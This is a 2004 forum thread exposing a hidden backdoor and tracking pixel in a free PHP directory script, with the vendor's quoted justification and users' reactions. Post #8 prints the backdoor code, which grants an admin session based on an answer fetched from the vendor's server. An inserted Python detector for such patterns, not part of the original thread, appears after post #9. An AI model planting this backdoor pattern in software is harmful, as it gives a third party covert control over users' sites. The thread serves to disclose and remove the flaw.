Web Directory Issues: Yahoo!, DMOZ, LookSmart, etc.
Post #1, 09-05-2004, 07:49 AM
Inactive, Join Date: 08-15-04, Location: Europe, Posts: 92
Backdoor in 'Free PHP Directory Script' ?
I read some reviews about Biz Directory's Free PHP Directory Script and some said that there was a backdoor that allowed the programmer to enter your admin area and delete everything in your database.
I had a quick look at the scripts but couldn't find anything besides an ordinary, invisible gif.
I wouldn't want to risk my directory because of this... free script or not.
Do you run this script?

Post #2, 09-05-2004, 08:17 AM
v7n Mentor, Join Date: 02-18-04, Location: We Are Penn State!, Posts: 3,554
I run the script. I save my databases frequently. If somebody did that then you can bet he would not be selling too many more scripts.

Post #3, 09-05-2004, 08:32 AM
Inactive, Join Date: 09-02-04, Location: Germany, Posts: 18
There are 2 dirty tricks inside the original free script:
1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer
Greets

Post #4, 09-05-2004, 09:28 AM
v7n Mentor, Join Date: 02-18-04, Location: We Are Penn State!, Posts: 3,554
Originally Posted by MarketingLady:
    There are 2 dirty tricks inside the original free script:
    1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
    2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer
    Greets
How do you remove the part in #1 while still leaving the script operable?
If you remove that line of code from #2, does that link go away?

Post #5, 09-05-2004, 09:40 AM
No Longer Here, Join Date: 09-27-03, Location: State College, PA, Posts: 9,354
These are only in the free version?

Post #6, 09-05-2004, 09:54 AM
v7n Mentor, Join Date: 02-18-04, Location: We Are Penn State!, Posts: 3,554
Originally Posted by Jazzee:
    These are only in the free version?
Well, if you do the $50 version you only take out the links back to his site... which is kinda screwed up if he leaves an easter egg link in there anyway.
Not sure about the $700 version. If he does it with that, then he is really messed up.

Post #7, 09-05-2004, 12:34 PM
v7n Mentor, Join Date: 01-25-04, Location: South Glens Falls, NY, Posts: 389
Originally Posted by awall19:
    Originally Posted by Jazzee:
        These are only in the free version?
    well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.
    not sure about the $700 version. if he does it with that then he is really messed up
The full version does not have it. I went through the whole script early today, but it has been modified a lot since installation, so I'm not exactly sure if it originally contained it.
I would be one aggravated person if it did. I paid what I considered big bucks for a script that had very poor cross-browser compatibility and have spent over $1,000 to make it so, and it's still not right.

Post #8, 09-05-2004, 01:57 PM
Inactive, Join Date: 09-02-04, Location: Germany, Posts: 18
Hi awall19
Here is a little "backdoor-fix" for #1 (this is the block in include.php that has to go):
    if ($pass) {
        $rand = md5(time());
        // the login decision is fetched from the vendor's server, not made locally
        $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
        $access = fread($access,4);
        if ($access == "true") {
            session_start();
            $HTTP_SESSION_VARS['admin'] = true;   // admin session granted on the remote answer
            header("Location: {$dir}admin_edit.php");
        };
    };
For my part, I don't like people programming backdoors into freely available scripts. It isn't honest at all!
I don't know if the $700 script has the backdoor too; if someone sends me the code, I need 2 days to check it out with some capable university specialists and post you all the results or, if necessary, fixes.
Greets from Germany

Post #9, 09-05-2004, 02:06 PM
Inactive, Join Date: 09-02-04, Location: Germany, Posts: 18
Sorry, awall19, I didn't answer your second question; to keep it simple, just replace the image inside <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> by your own image, e.g. <IMG SRC="http://www.mydomain.com/imges/any_image.gif" WIDTH=1 HEIGHT=1>, the image I mean being located on your own server. This way, bad boys can't get the referrer any more :-)
Greets
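As an added example (not code from this thread or from Biz Directory), here is a small Python checker for the two things MarketingLady points at in posts #3, #8 and #9: a login path whose outcome is fetched from a third-party host, and a 1x1 image served from a host you do not own. The PHP samples inside it are constructed from the snippets quoted in this thread, and own_hosts is an assumed parameter listing the domains you consider yours.

```python
import re
# Constructed samples modelled on the two findings quoted in this thread
# (assumption: they stand in for include.php / install4.php, not the real files).
INCLUDE_PHP = '''<?php
if ($pass) {
  $rand = md5(time());
  $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
  $access = fread($access,4);
  if ($access == "true") {
    session_start();
    $HTTP_SESSION_VARS['admin'] = true;
    header("Location: {$dir}admin_edit.php");
  };
};'''
INSTALL4_PHP = '<IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1>'
CLEAN_PHP = ('<?php $cfg = file_get_contents("config.txt"); ?>\n'
             '<IMG SRC="http://www.mydomain.com/imges/any_image.gif" WIDTH=1 HEIGHT=1>')

# PHP calls that will happily open a URL; the URL is captured so its host can be checked.
REMOTE_FETCH = re.compile(r'\b(fopen|file_get_contents|fsockopen|curl_init)\s*\(\s*["\']?(https?://[^"\'\s)]+)', re.I)
IMG_TAG = re.compile(r'<img\b[^>]*>', re.I)
SESSION_GRANT = re.compile(r'\$(?:_SESSION|HTTP_SESSION_VARS)\s*\[[^\]]*\]\s*=')

def host_of(url):
    return re.match(r'https?://([^/:?#]+)', url, re.I).group(1).lower()

def scan(name, source, own_hosts=()):
    """Return (file, kind, host) tuples for phone-home fetches and 1x1 images on foreign hosts."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for m in REMOTE_FETCH.finditer(source):
        host = host_of(m.group(2))
        if host in own:
            continue
        # A fetched answer that is later written into the session means the login
        # decision is taken by a third-party server: that is the backdoor shape above.
        kind = 'remote-auth-decision' if SESSION_GRANT.search(source, m.end()) else 'remote-fetch'
        findings.append((name, kind, host))
    for m in IMG_TAG.finditer(source):
        tag = m.group(0)
        src = re.search(r'src\s*=\s*["\']?(https?://[^"\'\s>]+)', tag, re.I)
        tiny = re.search(r'width\s*=\s*["\']?1\b', tag, re.I) and re.search(r'height\s*=\s*["\']?1\b', tag, re.I)
        if src and tiny and host_of(src.group(1)) not in own:
            findings.append((name, 'tracking-pixel', host_of(src.group(1))))
    return findings

def scan_all(files, own_hosts=()):
    """files: {filename: source}. Returns all findings across the tree."""
    return [f for name, src in files.items() for f in scan(name, src, own_hosts)]
```

Run scan_all over a dict of your script's files (read from disk) with your own domain in own_hosts; anything reported as remote-auth-decision deserves the same treatment as the block quoted above.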

Post #10, 09-05-2004, 02:27 PM
v7n Mentor, Join Date: 02-18-04, Location: We Are Penn State!, Posts: 3,554
Originally Posted by MarketingLady:
    Hi awall19
    Here is a little "backdoor-fix" for #1
        if ($pass) {
            $rand = md5(time());
            $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
            $access = fread($access,4);
            if ($access == "true") {
                session_start();
                $HTTP_SESSION_VARS['admin'] = true;
                header("Location: {$dir}admin_edit.php");
            };
        };
    Greets from Germany
I pulled this part ttp://www.directory-search.org/include_variables.php? out of my script. Does that work? What details was he sending? The phpMyAdmin variables or just the general MySQL connect info?

Post #11, 09-06-2004, 07:40 AM
Contributing Member, Join Date: 01-19-04, Posts: 67
I have sent the link of this thread to Javier García of Biz Directory. Awaiting his response.

Post #12, 09-06-2004, 08:53 AM
Inactive, Join Date: 10-13-03, Location: Lebanon, Posts: 4,099
Please inform us ASAP!

Post #13, 09-06-2004, 09:18 AM
Contributing Member, Join Date: 01-19-04, Posts: 67
He has sent a reply to me - reproduced below:
"The invisible image is just that, an image, unable to hurt in any way. It allows us to keep the records of installed scripts. It's more convenient than requesting the installation url every time the script is downloaded/installed.
The backdoor is password-protected, so it is impossible nobody but us can access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this feature.
I can assure you no legal user of the script has anything to be afraid. In fact, if you or any other purchaser want a script copy without these things, I will have no problem sending it.
Regards
Javier García
Biz Directory"
So it turns out they have been stealing our passwords?

Post #14, 09-06-2004, 09:42 AM
No Longer Here, Join Date: 09-27-03, Location: State College, PA, Posts: 9,354
That is ridiculous. Shouldn't they have to tell you about that when you download the script?

Post #15, 09-06-2004, 10:38 AM
Inactive, Join Date: 07-31-04, Posts: 272
Unless that's written somewhere in their TOS and you agree to it, it is illegal for them to do this. That's just like distributing a trojan.

Post #16, 09-06-2004, 12:56 PM
Inactive, Join Date: 08-15-04, Location: Europe, Posts: 92
Originally Posted by Jazzee:
    That is ridiculous. Shouldn't they have to tell you about that when you download the script?
Well, would anybody download it if they advertised it as a backdoor script?
-
Thanks for the research. After having a look at the programmer's email I decided to remove the backdoor (AND the uninstall script) and install the script first of all. I also installed another script that will have a look at the script directory and the MySQL database... not sure if it will remain online yet.

Post #17, 09-06-2004, 12:58 PM
No Longer Here, Join Date: 09-27-03, Location: State College, PA, Posts: 9,354
Originally Posted by Brian911:
    well, would anybody download it if they advertised it as a backdoor script?
No, but you'd think they'd have it in fine print somewhere.

Post #18, 09-06-2004, 01:01 PM
CEO, V7 Inc, Join Date: 09-27-03, Location: Japan, mostly, Posts: 42,618
That is just on the free version. And, I can see Javier's point. If I offered a script for free, and they removed copyright notices/etc, I wouldn't be too happy.

Post #19, 09-06-2004, 01:02 PM
No Longer Here, Join Date: 09-27-03, Location: State College, PA, Posts: 9,354
That doesn't make it right.

Post #20, 09-06-2004, 01:08 PM
CEO, V7 Inc, Join Date: 09-27-03, Location: Japan, mostly, Posts: 42,618
I fail to see how it could be wrong.
© Copyright 2008 V7 Inc